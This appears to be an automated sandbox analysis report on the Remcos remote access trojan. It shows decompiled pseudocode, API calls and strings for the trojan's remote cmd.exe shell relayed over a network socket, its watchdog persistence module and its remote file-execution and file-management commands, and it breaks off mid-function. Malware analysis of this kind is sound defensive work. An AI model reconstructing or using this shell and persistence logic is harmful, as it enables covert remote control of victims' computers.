                    • API ID: Deallocatestd::_
                    • String ID:
                    • API String ID: 1323251999-0
                    • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                    • Instruction ID: f1c392dd827dd7386799fb200fb30366daf9a0dc8118a507330e02bf81cd2882
                    • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                    • Instruction Fuzzy Hash: 2AB092364542007BCA016600AD86B6EB7526BA0710F14C82ABA98280E0E6B7426AA687
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E0040567A() {
                    				char _v4;
                    				void* _v16;
                    				char _v28;
                    				char _v52;
                    				long _v56;
                    				long _v60;
                    				CHAR* _v64;
                    				intOrPtr _v68;
                    				void* _v72;
                    				char _v76;
                    				CHAR* _v84;
                    				long _v92;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				long _t52;
                    				void* _t56;
                    				void* _t66;
                    				void* _t70;
                    				void* _t79;
                    				CHAR* _t80;
                    				CHAR* _t97;
                    				void* _t105;
                    				intOrPtr _t135;
                    				signed int _t138;
                    				signed int _t139;
                    				long _t141;
                    				char* _t143;
                    				void* _t149;
                    				void* _t155;
                    				void* _t161;
                    				void* _t168;
                    
                    				_t149 =  &_v68;
                    				_t135 =  *((intOrPtr*)( *[fs:0x2c]));
                    				_t139 = _t138 | 0xffffffff;
                    				_t97 = 0;
                    				if( *0x474c10 >  *((intOrPtr*)(_t135 + 4))) {
                    					E00432CF1(0x474c10);
                    					_t152 =  *0x474c10 - _t139;
                    					if( *0x474c10 == _t139) {
                    						E004046D7(0x474b70, 0x474c10, 0);
                    						E0043307B(_t152, E00456897);
                    						E00432CB2(_t139, 0x474c10);
                    					}
                    				}
                    				if( *0x474bf0 >  *((intOrPtr*)(_t135 + 4))) {
                    					E00432CF1(0x474bf0);
                    					_t154 =  *0x474bf0 - _t139;
                    					if( *0x474bf0 == _t139) {
                    						E004020BF(_t97, 0x474c18);
                    						E0043307B(_t154, E0045688D);
                    						E00432CB2(_t139, 0x474bf0);
                    					}
                    				}
                    				_t98 =  &_v52;
                    				E004020BF(_t97,  &_v52);
                    				_t143 = 0x472f78;
                    				_t136 = CloseHandle;
                    				_v64 = _t97;
                    				_t155 =  *0x470ae6 - _t97; // 0x0
                    				if(_t155 != 0) {
                    					L12:
                    					_v60 = _t97;
                    					PeekNamedPipe( *0x474bf8, _t97, _t97, _t97,  &_v60, _t97);
                    					if(_v60 <= _t97) {
                    						_t149 = _t149 - 0x18;
                    						E00402073(_t97, _t149, _t134, _t143, 0x464074);
                    						_push(0x62);
                    						_t139 = E00404A81(0x474b70, _t134, __eflags);
                    						goto L21;
                    					}
                    					_push(_v60);
                    					_t56 = E0043A620(_t98);
                    					_t144 = _t56;
                    					ReadFile( *0x474bf8, _t56, _v60,  &_v56, _t97);
                    					if(_v56 <= _t97) {
                    						L19:
                    						L0043A61B(_t144);
                    						_t143 = 0x472f78;
                    						goto L21;
                    					}
                    					if(_v64 <= _t97) {
                    						L17:
                    						E00402073(_t97,  &_v28, _t134, _t144, _t144);
                    						_t149 = _t149 - 0x18;
                    						_t105 = _t149;
                    						_push(_v60);
                    						_push(_t97);
                    						L18:
                    						E00405A8B(_t97, _t105, _t134, _t144, _t165);
                    						_t139 = E00404A81(0x474b70, _t134, _t165, 0x62,  &_v28);
                    						E00401FB8();
                    						goto L19;
                    					}
                    					_t66 = E0043A630(_t144, E00401F8B( &_v52), _v64);
                    					_t149 = _t149 + 0xc;
                    					_t165 = _t66;
                    					if(_t66 != 0) {
                    						goto L17;
                    					}
                    					E00402073(_t97,  &_v28, _t134, _t144, _t144);
                    					_t149 = _t149 - 0x18;
                    					_t105 = _t149;
                    					_push(_v60 - _v68);
                    					_push(_v68);
                    					goto L18;
                    				} else {
                    					_t134 = "cmd.exe";
                    					_t98 = 0x472f78;
                    					_t70 = E00405AE5("cmd.exe");
                    					_t156 = _t70;
                    					if(_t70 == 0) {
                    						L11:
                    						_t161 =  *0x470ae6 - _t97; // 0x0
                    						if(_t161 == 0) {
                    							L26:
                    							E00404E06(_t134);
                    							CloseHandle( *0x474bf8);
                    							CloseHandle( *0x474c14);
                    							 *0x470ae6 = _t97;
                    							_t97 = 1;
                    							L27:
                    							E00401FB8();
                    							E00401FB8();
                    							return _t97;
                    						} else {
                    							goto L12;
                    						}
                    						do {
                    							goto L12;
                    							L21:
                    							_t38 =  <=  ? 0 :  *0x470ae7 & 0x000000ff;
                    							_t98 = _t143;
                    							 *0x470ae7 =  <=  ? 0 :  *0x470ae7 & 0x000000ff;
                    							if(E0040245C() == 0) {
                    								_v84 = _t97;
                    							} else {
                    								L0040535D(_t97, _t143, _t134, _t136, _t143, "\n");
                    								E00401FA0( &_v76, _t143);
                    								_t52 = E0040245C();
                    								WriteFile( *0x474bf4, E00401F8B(_t143), _t52,  &_v92, _t97);
                    								_t98 = _t143;
                    								L00405A86(_t97, _t143, _t134, 0x464074);
                    							}
                    							Sleep(0x64);
                    							_t168 =  *0x470ae7 - _t97; // 0x0
                    						} while (_t168 != 0);
                    						TerminateProcess(0x474bfc->hProcess, _t97);
                    						CloseHandle( *0x474c00);
                    						CloseHandle( *0x474bfc);
                    						goto L26;
                    					}
                    					L00405A86(_t97, 0x474c18, "cmd.exe", E0043A9AA(_t97, _t156, "SystemDrive"));
                    					L0040535D(_t97, 0x474c18, "cmd.exe", CloseHandle, 0x474c18, "\\");
                    					0x474b18->nLength = 0xc;
                    					 *0x474b20 = 1;
                    					 *0x474b1c = _t97;
                    					if(CreatePipe(0x474c0c, 0x474bf4, 0x474b18, _t97) == 0 || CreatePipe(0x474bf8, 0x474c14, 0x474b18, _t97) == 0) {
                    						goto L27;
                    					} else {
                    						_t141 = 0x44;
                    						E00435760(CloseHandle, 0x474b28, _t97, CreatePipe);
                    						0x474b28->cb = _t141;
                    						 *0x474b54 = 0x101;
                    						 *0x474b58 = 0;
                    						 *0x474b60 =  *0x474c0c;
                    						_t79 =  *0x474c14;
                    						 *0x474b64 = _t79;
                    						 *0x474b68 = _t79;
                    						_t80 = E00401F8B(0x474c18);
                    						_t143 = 0x472f78;
                    						 *0x470ae6 = CreateProcessA(_t97, E00401F8B(0x472f78), _t97, _t97, 1, _t97, _t97, _t80, 0x474b28, 0x474bfc) != 0;
                    						L00405A86(_t97, 0x472f78, _t134, 0x464074);
                    						 *0x470ae7 = 1;
                    						E0040480D(0x474b70);
                    						E004048A8(0x474b70, 0x474b70, 0x474b70);
                    						_t149 = _t149 + 0xc - 0x18;
                    						E004020D6(_t97, _t149, _t134,  *0x470ae6,  &_v4);
                    						_push(0x93);
                    						_t98 = 0x474b70;
                    						_t139 = E00404A81(0x474b70, _t134,  *0x470ae6);
                    						Sleep(0x12c);
                    						goto L11;
                    					}
                    				}
                    			}





































                    APIs
                    • __Init_thread_footer.LIBCMT ref: 004056C6
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                    • __Init_thread_footer.LIBCMT ref: 00405703
                    • CreatePipe.KERNEL32(00474C0C,00474BF4,00474B18,00000000,0046408C,00000000), ref: 00405796
                    • CreatePipe.KERNEL32(00474BF8,00474C14,00474B18,00000000), ref: 004057AC
                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00474B28,00474BFC), ref: 0040581F
                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
                      • Part of subcall function 0043307B: __onexit.LIBCMT ref: 00433081
                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,00472F78,00464090,00000062,00464074), ref: 004059C4
                    • Sleep.KERNEL32(00000064,00000062,00464074), ref: 004059DE
                    • TerminateProcess.KERNEL32(00000000), ref: 004059F7
                    • CloseHandle.KERNEL32 ref: 00405A03
                    • CloseHandle.KERNEL32 ref: 00405A0B
                    • CloseHandle.KERNEL32 ref: 00405A1D
                    • CloseHandle.KERNEL32 ref: 00405A25
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                    • String ID: (KG$SystemDrive$cmd.exe$pKG$pKG$pKG$pKG$pKG$x/G$x/G$x/G
                    • API String ID: 2994406822-2676871211
                    • Opcode ID: 8e675c81dd6edeb1989733422e1078b2b669ac3476995aad7f6ef634cbc747fb
                    • Instruction ID: 3b714476e132253386e4612caa6ffda136c57d83f36fbb8ab3cb78f76cc16c3c
                    • Opcode Fuzzy Hash: 8e675c81dd6edeb1989733422e1078b2b669ac3476995aad7f6ef634cbc747fb
                    • Instruction Fuzzy Hash: AD91C371644205EFC700BB65AD52E7F36A8EB84344F01453FF949A72E2DB789C848B6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E0041163A(void* __eflags) {
                    				char _v28;
                    				char _v36;
                    				void* _v40;
                    				char _v56;
                    				void* _v64;
                    				char _v76;
                    				void* _v84;
                    				char _v100;
                    				char _v108;
                    				char _v124;
                    				char _v128;
                    				char _v132;
                    				char _v136;
                    				char _v140;
                    				long _v144;
                    				char _v148;
                    				char _v156;
                    				char _v160;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				long _t41;
                    				CHAR* _t44;
                    				void* _t45;
                    				void* _t51;
                    				void* _t72;
                    				intOrPtr _t83;
                    				void* _t84;
                    				void* _t92;
                    				void* _t93;
                    				void* _t110;
                    				long _t158;
                    				int _t184;
                    				long _t186;
                    				void* _t187;
                    				char* _t189;
                    				void* _t190;
                    				void* _t192;
                    				signed int _t193;
                    				void* _t195;
                    				void* _t202;
                    
                    				_t195 = (_t193 & 0xfffffff8) - 0x8c;
                    				_push(_t187);
                    				_t41 = GetCurrentProcessId();
                    				_t178 = E00401F8B(0x473238);
                    				if(E00412B5F(0x473238, _t42, "WD", _t41) != 0) {
                    					_t44 = E00401F8B(0x473370);
                    					_t184 = 0;
                    					_t45 = OpenMutexA(0x100000, 0, _t44);
                    					__eflags = _t45;
                    					if(_t45 == 0) {
                    						E004020BF(0x473238,  &_v76);
                    						E00401EE4(0x473220);
                    						E0041ADFE( &_v76);
                    						E00401F66(0x473238,  &_v100);
                    						__eflags = E0041AB12( &_v100);
                    						if(__eflags != 0) {
                    							_t51 = E0040415E(0x473238,  &_v124,  &_v76, _t192, L"\\SysWOW64\\");
                    							_t180 = E0040415E(0x473238,  &_v56,  &_v76, _t192, E0043A99F(0x473238,  &_v124, __eflags, L"WinDir"));
                    							E00401EF3( &_v108, _t53, _t187, E00402F85( &_v36, _t53, _t51));
                    							E00401EE9();
                    							E00401EE9();
                    						} else {
                    							_t93 = E0040415E(0x473238,  &_v28,  &_v76, _t192, L"\\system32\\");
                    							_t180 = E0040415E(0x473238,  &_v56,  &_v76, _t192, E0043A99F(0x473238,  &_v28, __eflags, L"WinDir"));
                    							E00401EF3( &_v108, _t95, _t187, E00402F85( &_v132, _t95, _t93));
                    							E00401EE9();
                    							E00401EE9();
                    						}
                    						E00401EE9();
                    						E0040BEC3( &_v136);
                    						E0040415E(0x473238,  &_v124, _t180, _t192, L"svchost.exe");
                    						E00411DC0(0x473238,  &_v140, _t192, __eflags,  &_v128);
                    						E00401EE9();
                    						E0040415E(0x473238,  &_v132, _t180, _t192, L"rmclient.exe");
                    						E00411DC0(0x473238,  &_v148, _t192, __eflags,  &_v136);
                    						E00401EE9();
                    						E0040415E(0x473238,  &_v140, _t180, _t192, L"fsutil.exe");
                    						E00411DC0(0x473238,  &_v156, _t192, __eflags,  &_v144);
                    						E00401EE9();
                    						_t72 = E004021DA( &_v160);
                    						__eflags = _t72;
                    						if(_t72 != 0) {
                    							while(1) {
                    								_push(0x470d64);
                    								_t189 = E00401F8B( &_v76);
                    								_t83 = E00401EE4(E00401E45( &_v136, _t180, _t192, __eflags, _t184));
                    								_t180 = _t189;
                    								_t84 = E00416FDD(_t83, _t189);
                    								__eflags = _t84;
                    								if(_t84 != 0) {
                    									break;
                    								}
                    								_t184 = _t184 + 1;
                    								_t92 = E004021DA( &_v136);
                    								__eflags = _t184 - _t92;
                    								if(_t184 < _t92) {
                    									continue;
                    								}
                    								goto L11;
                    							}
                    							E00402073(0x473238, _t195 - 0x18, _t180, _t192, "Watchdog module activated");
                    							E00402073(0x473238, _t195, _t180, _t192, "i");
                    							E0041A04A(0x473238, _t184);
                    							Sleep(0x7d0);
                    							_t158 =  *0x470d6c; // 0x0
                    							goto L15;
                    						}
                    						L11:
                    						E00402073(0x473238, _t195 - 0x18, _t180, _t192, "Watchdog launch failed!");
                    						E00402073(0x473238, _t195, _t180, _t192, "E");
                    						E0041A04A(0x473238, _t184);
                    						CloseHandle( *0x470d74);
                    						E00406150( &_v144);
                    						E00401EE9();
                    						E00401FB8();
                    						_push(3);
                    						_pop(1);
                    					} else {
                    						CloseHandle(_t45);
                    						_t202 = _t195 - 0x18;
                    						E00402073(0x473238, _t202, _t178, _t192, "Remcos restarted by watchdog!");
                    						_t203 = _t202 - 0x18;
                    						E00402073(0x473238, _t202 - 0x18, _t178, _t192, "i");
                    						E0041A04A(0x473238, 0);
                    						E00402073(0x473238, _t203 + 0x18, _t178, _t192, "Watchdog module activated");
                    						E00402073(0x473238, _t203 + 0x18 - 0x18, _t178, _t192, "i");
                    						E0041A04A(0x473238, 0);
                    						CreateThread(0, 0, E00411D31, 0, 0, 0);
                    						_t189 = "WDH";
                    						_t110 = E00412831(E00401F8B(0x473238), _t189,  &_v160);
                    						__eflags = _t110;
                    						if(_t110 == 0) {
                    							goto L1;
                    						} else {
                    							 *0x470d64 = OpenProcess(0x1fffff, 0, _v144);
                    							E00412C91(E00401F8B(0x473238), __eflags, _t189);
                    							_t158 = _v144;
                    							L15:
                    							L16();
                    							asm("int3");
                    							_push(_t189);
                    							_push(_t184);
                    							_t186 = _t158;
                    							L17:
                    							_t190 = OpenProcess(0x100000, 0, _t186);
                    							WaitForSingleObject(_t190, 0xffffffff);
                    							CloseHandle(_t190);
                    							__eflags =  *0x470d4b;
                    							if(__eflags != 0) {
                    								E0041163A(__eflags, 0);
                    							}
                    							goto L17;
                    						}
                    						L19:
                    					}
                    				} else {
                    					L1:
                    				}
                    				return 1;
                    				goto L19;
                    			}

                    APIs
                    • GetCurrentProcessId.KERNEL32 ref: 00411649
                      • Part of subcall function 00412B5F: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 00412B6D
                      • Part of subcall function 00412B5F: RegSetValueExA.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004,00000000,?,?,00406D84,elev,00000001,00415F87,00000001,00000000,00000000), ref: 00412B88
                      • Part of subcall function 00412B5F: RegCloseKey.ADVAPI32(00000000,?,?,00406D84,elev,00000001,00415F87,00000001,00000000,00000000,00000000), ref: 00412B93
                    • OpenMutexA.KERNEL32 ref: 00411689
                    • CloseHandle.KERNEL32(00000000), ref: 00411698
                    • CreateThread.KERNEL32 ref: 004116EE
                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041195D
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                    • String ID: 2G$82G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$p3G$rmclient.exe$svchost.exe$Cqt
                    • API String ID: 3018269243-2657394792
                    • Opcode ID: 7d37437b41f715853253f697b476e1f2b9fa8c2a3dfb8a05b2250b664f443c55
                    • Instruction ID: 2a728e4d40dbe9f2dcab1c582d9c47d784adc50530ded27a5339f3dd002cc33c
                    • Opcode Fuzzy Hash: 7d37437b41f715853253f697b476e1f2b9fa8c2a3dfb8a05b2250b664f443c55
                    • Instruction Fuzzy Hash: 1A719E3160430157C204FB62DD9ADAE77A8AF90308F40093FF546621E2EE7C9A49C6AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E0040730B(char* __edx, void* __eflags, intOrPtr _a4) {
                    				char _v268;
                    				char _v396;
                    				char _v400;
                    				char _v416;
                    				void* _v420;
                    				char _v424;
                    				char _v432;
                    				char _v440;
                    				char _v444;
                    				char _v448;
                    				char _v468;
                    				char _v476;
                    				char _v480;
                    				void* _v488;
                    				char _v492;
                    				char _v496;
                    				char _v504;
                    				char _v512;
                    				char _v516;
                    				char _v520;
                    				void* _v524;
                    				char _v528;
                    				char _v536;
                    				char _v540;
                    				char _v544;
                    				char _v548;
                    				char _v552;
                    				char _v556;
                    				char _v560;
                    				char _v564;
                    				char _v568;
                    				char _v572;
                    				char _v576;
                    				void* _v588;
                    				void* _v596;
                    				char _v600;
                    				char _v612;
                    				char _v620;
                    				char _v624;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t166;
                    				int _t182;
                    				void* _t186;
                    				void* _t190;
                    				void* _t198;
                    				int _t200;
                    				int _t210;
                    				int _t213;
                    				void* _t229;
                    				int _t231;
                    				long _t237;
                    				int _t240;
                    				void* _t254;
                    				signed int _t256;
                    				void* _t267;
                    				char* _t269;
                    				void* _t270;
                    				void* _t281;
                    				void* _t297;
                    				void* _t307;
                    				void* _t324;
                    				void* _t325;
                    				void* _t338;
                    				void* _t345;
                    				void* _t349;
                    				int _t350;
                    				void* _t354;
                    				void* _t365;
                    				signed int _t379;
                    				void* _t383;
                    				void* _t388;
                    				void* _t398;
                    				int _t465;
                    				void* _t614;
                    				void* _t617;
                    				short* _t640;
                    				intOrPtr _t650;
                    				intOrPtr _t651;
                    				int _t652;
                    				int _t654;
                    				int _t656;
                    				int _t657;
                    				int _t658;
                    				int _t659;
                    				void* _t662;
                    				void* _t664;
                    				void* _t666;
                    				void* _t668;
                    				void* _t669;
                    				void* _t670;
                    				void* _t673;
                    				void* _t674;
                    				signed int _t675;
                    				void* _t678;
                    				void* _t679;
                    				void* _t680;
                    				void* _t683;
                    				void* _t684;
                    				void* _t685;
                    				void* _t686;
                    				void* _t688;
                    				void* _t689;
                    				void* _t690;
                    				void* _t699;
                    				void* _t700;
                    				void* _t718;
                    				void* _t719;
                    				void* _t720;
                    				void* _t722;
                    				void* _t724;
                    				void* _t732;
                    				void* _t733;
                    				void* _t734;
                    				void* _t735;
                    				void* _t736;
                    				void* _t738;
                    				signed int _t747;
                    
                    				_t737 = __eflags;
                    				_t629 = __edx;
                    				_push(0);
                    				_t650 = _a4;
                    				E004020D6(0,  &_v444, __edx, __eflags, _t650 + 0xc);
                    				SetEvent( *(_t650 + 0x24));
                    				_t651 =  *((intOrPtr*)(E00401F8B( &_v448)));
                    				E00404182( &_v448,  &_v424, 4, 0xffffffff);
                    				_t678 = (_t675 & 0xfffffff8) - 0x20c;
                    				E004020D6(0, _t678, _t629, _t737, 0x472ec8);
                    				_t679 = _t678 - 0x18;
                    				E004020D6(0, _t679, _t629, _t737,  &_v440);
                    				E0041A976( &_v576, _t629);
                    				_t680 = _t679 + 0x30;
                    				_t738 = _t651 - 0x8d;
                    				if(_t738 > 0) {
                    					_t652 = _t651 - 0x8e;
                    					__eflags = _t652;
                    					if(_t652 == 0) {
                    						__eflags = 0;
                    						E0040415E(0,  &_v544, _t629, _t674, E00401F8B(E00401E45( &_v552, _t629, _t674, 0, 0)));
                    						_t166 = E00401F8B(E00401E45( &_v560, _t629, _t674, __eflags, 1));
                    						_t629 =  &_v552;
                    						CreateDirectoryW(E00401EE4(E004087F0( &_v480,  &_v552, _t674, _t166)), 0);
                    						E00401EE9();
                    						E0040322F(0x2a);
                    						E004086D0(0, _t680 - 0x18,  &_v552, __eflags,  &_v556);
                    						goto L57;
                    					} else {
                    						_t654 = _t652 - 3;
                    						__eflags = _t654;
                    						if(__eflags == 0) {
                    							_t182 = StrToIntA(E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)));
                    							_t629 = E00401F8B(E00401E45( &_v556, _t629, _t674, __eflags, 1));
                    							E0041B35B(_t182, _t184);
                    						} else {
                    							_t656 = _t654 - 0x24;
                    							__eflags = _t656;
                    							if(__eflags == 0) {
                    								 *0x470b18 = 0;
                    								_t186 = E00401E45( &_v552, _t629, _t674, __eflags, 2);
                    								_t683 = _t680 - 0x18;
                    								E004020D6(0, _t683, _t629, __eflags, _t186);
                    								_t684 = _t683 - 0x18;
                    								E0040415E(0, _t684, _t629, _t674, 0x46a8f0);
                    								_t190 = E00401F8B(E00401E45( &_v564, _t629, _t674, __eflags, 0));
                    								_t685 = _t684 - 0x18;
                    								E0040415E(0, _t685, _t629, _t674, _t190);
                    								E00401E45( &_v572, _t629, _t674, __eflags, 1);
                    								E00407E80(E0041A947(__eflags), _t629, __eflags);
                    								_t686 = _t685 + 0x48;
                    								__eflags =  *0x470b18; // 0x0
                    								if(__eflags == 0) {
                    									Sleep(0x7d0);
                    									E004020D6(0, _t686 - 0x18, _t629, __eflags, E00401E45( &_v552, _t629, _t674, __eflags, 0));
                    									_push(0xb9);
                    									goto L54;
                    								}
                    							} else {
                    								_t657 = _t656 - 3;
                    								__eflags = _t657;
                    								if(_t657 == 0) {
                    									 *0x470b18 = 1;
                    								} else {
                    									_t658 = _t657 - 0xa;
                    									__eflags = _t658;
                    									if(__eflags == 0) {
                    										_t198 = E00401E45( &_v552, _t629, _t674, __eflags, 2);
                    										_t688 = _t680 - 0x18;
                    										E004020D6(0, _t688, _t629, __eflags, _t198);
                    										_t200 = E00407268(_t674);
                    										_t689 = _t688 + 0x18;
                    										__eflags = _t200;
                    										if(_t200 != 0) {
                    											E00435760(0x472ec8,  &_v268, 0, 0x104);
                    											_t690 = _t689 + 0xc;
                    											 *0x470b20(E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)),  &_v268);
                    											_t210 = E0043A3AC(_t207, E00401F8B(E00401E45( &_v556, _t629, _t674, __eflags, 1)));
                    											__eflags = _t210;
                    											if(__eflags == 0) {
                    												_t691 = _t690 - 0x18;
                    												goto L50;
                    											} else {
                    												_t213 = _t210 - 1;
                    												__eflags = _t213;
                    												if(__eflags == 0) {
                    													E00402073(0,  &_v516, _t629, _t674,  &_v268);
                    													E004020D6(0, _t690 - 0x18, _t629, __eflags, 0x472fa8);
                    													E0040415E(0, _t690, _t629, _t674, 0x46a8f0);
                    													_t629 =  &_v528;
                    													E0041A7B9(_t690 - 0xffffffffffffffe8,  &_v528);
                    													_t465 = 0;
                    													__eflags = 0;
                    													goto L48;
                    												} else {
                    													__eflags = _t213 - 1;
                    													if(__eflags == 0) {
                    														E00402073(0,  &_v516, _t629, _t674,  &_v268);
                    														E004020D6(0, _t690 - 0x18, _t629, __eflags, 0x472fa8);
                    														E0040415E(0, _t690, _t629, _t674, 0x46a8f0);
                    														_t629 =  &_v528;
                    														E0041A7B9(_t690 - 0xffffffffffffffe8,  &_v528);
                    														_t465 = 1;
                    														L48:
                    														E004080F9(_t465, _t629, 0x472ec8);
                    														E00401FB8();
                    														DeleteFileA( &_v268);
                    													}
                    												}
                    											}
                    										}
                    									} else {
                    										_t659 = _t658 - 1;
                    										__eflags = _t659;
                    										if(__eflags == 0) {
                    											_t229 = E00401E45( &_v552, _t629, _t674, __eflags, 1);
                    											_t699 = _t680 - 0x18;
                    											E004020D6(0, _t699, _t629, __eflags, _t229);
                    											_t231 = E00407268(_t674);
                    											_t700 = _t699 + 0x18;
                    											__eflags = _t231;
                    											if(__eflags != 0) {
                    												 *0x470b1c(E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)));
                    												_t691 = _t700 - 0x14;
                    												L50:
                    												E004086D0(0, _t691, _t629, __eflags, 0x472f90);
                    												E00406EB0();
                    												goto L27;
                    											}
                    										} else {
                    											_t660 = _t659 - 4;
                    											__eflags = _t659 - 4;
                    											if(__eflags == 0) {
                    												_t237 = E0043A3AC(_t235, E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 1)));
                    												_t240 = SetFileAttributesW(E00401F8B(E00401E45( &_v556, _t629, _t674, __eflags, _t660)), _t237);
                    												__eflags = _t240;
                    												E0041A951(_t680 - 0x18, _t629);
                    												_push(0xc7);
                    												L54:
                    												E00404A81(0x472fc0, _t629, __eflags);
                    											}
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    				} else {
                    					if(_t738 == 0) {
                    						E0040415E(0,  &_v544, _t629, _t674, E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)));
                    						E0040415E(0,  &_v528, _t629, _t674, E00401F8B(E00401E45( &_v560, _t629, _t674, __eflags, 1)));
                    						E00408682( &_v564,  &_v516, 0, E0040869C( &_v556,  &_v528,  &_v528) + 1);
                    						_t254 = E00401EE4(E00408897( &_v504,  &_v528, _t674,  &_v552));
                    						_t256 = E0043E1F7(E00401EE4( &_v576), _t254);
                    						asm("sbb bl, bl");
                    						E00401EE9();
                    						_t408 =  ~_t256 + 1;
                    						__eflags =  ~_t256 + 1;
                    						if( ~_t256 + 1 == 0) {
                    							_t629 = E004052FE( &_v468, "Unable to rename file!", _t674, 0x472ec8);
                    							E00408832(_t408, _t680 - 0x18, _t258, 0x472ec8, _t674, __eflags, "16");
                    							_push(0x59);
                    							E00404A81(0x472fc0, _t258, __eflags);
                    							E00401FB8();
                    						} else {
                    							_t629 =  &_v492;
                    							E004087F0(_t680 - 0x18,  &_v492, _t674, "*");
                    							E00406EB0();
                    						}
                    						E00401EE9();
                    						E00401EE9();
                    						goto L58;
                    					} else {
                    						_t662 = _t651 - 0x61;
                    						if(_t662 == 0) {
                    							_t267 = E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0));
                    							_t691 = _t680 - 0x18;
                    							E0040415E(0, _t680 - 0x18, _t629, _t674, _t267);
                    							_t269 = E00401E45( &_v560, _t629, _t674, __eflags, 2);
                    							_t270 = E00401E45( &_v564, _t629, _t674, __eflags, 1);
                    							_t629 = _t269;
                    							E00419BA2(_t270, _t269);
                    							L27:
                    						} else {
                    							_t664 = _t662 - 0x26;
                    							if(_t664 == 0) {
                    								GetLogicalDriveStringsA(0x64,  &_v396);
                    								E00402097(0,  &_v540, _t629, _t674, __eflags,  &_v396, 0x64);
                    								__eflags = E004061F0( &_v548, 0x464518, 0, 2) + 1;
                    								E00401F7D(E004061F0( &_v548, 0x464518, 0, 2) + 1);
                    								E004020D6(0, _t680 - 0x18, _t629, E004061F0( &_v548, 0x464518, 0, 2) + 1,  &_v564);
                    								_t281 = E00407121(0,  &_v544, _t629);
                    								_t629 = E00402F11( &_v496,  &_v568, _t674, 0x472ec8);
                    								E00402E81(_t680 - 0x18, _t282, _t281);
                    								_push(0x51);
                    								E00404A81(0x472fc0, _t282, __eflags);
                    								E00401FB8();
                    								E00401FB8();
                    								goto L25;
                    							} else {
                    								_t666 = _t664 - 1;
                    								if(_t666 == 0) {
                    									L004086CB(0, 0x472f90, _t629, E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)));
                    									E004086D0(0, _t680 - 0x18, _t629, __eflags, 0x472f90);
                    									E00406EB0();
                    									_t297 = E0041A819( &_v492, E00408682(0x472f90,  &_v528, 0, E0040245C() - 2));
                    									_t629 = "Browsing directory: ";
                    									E004052DD(0, _t680 - 0x18 + 0x18 - 0x18, "Browsing directory: ", _t674, __eflags, _t297);
                    									E00402073(0, _t680 - 0x18 + 0x18 - 4, "Browsing directory: ", _t674, "i");
                    									E0041A04A(0, 0x472ec8);
                    									E00401FB8();
                    									goto L59;
                    								} else {
                    									_t668 = _t666 - 1;
                    									if(_t668 == 0) {
                    										E0040415E(0,  &_v544, _t629, _t674, E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)));
                    										ShellExecuteW(0, L"open", E00401EE4( &_v548), 0, 0, 1);
                    										_t307 = E0041A819( &_v476,  &_v548);
                    										_t629 = "Executing file: ";
                    										E004052DD(0, _t680 - 0x18, "Executing file: ", _t674, __eflags, _t307);
                    										E00402073(0, _t680 - 4, "Executing file: ", _t674, "i");
                    										E0041A04A(0, 0x472ec8);
                    										E00401FB8();
                    										goto L58;
                    									} else {
                    										_t669 = _t668 - 1;
                    										if(_t669 == 0) {
                    											 *0x470b18 = 0;
                    											E004020D6(0, _t680 - 0x18, _t629, __eflags, E00401E45( &_v552, _t629, _t674, __eflags, 2));
                    											E0040415E(0, _t680, _t629, _t674, 0x46a8f0);
                    											E0040415E(0, _t680 - 0xffffffffffffffe8, _t629, _t674, E00401F8B(E00401E45( &_v564, _t629, _t674, __eflags, 0)));
                    											E00401E45( &_v572, _t629, _t674, __eflags, 1);
                    											E004080F9(E0041A947(__eflags), _t629, 0x472ec8);
                    										} else {
                    											_t670 = _t669 - 1;
                    											if(_t670 == 0) {
                    												 *0x470b18 = 0;
                    												E004020BF(0,  &_v468);
                    												E004046D7( &_v396, _t674, 1);
                    												E004048A8( &_v400, _t670,  &_v396);
                    												_t324 = E00401E45( &_v560, _t629, _t674, __eflags, 3);
                    												_t718 = _t680 - 0x18;
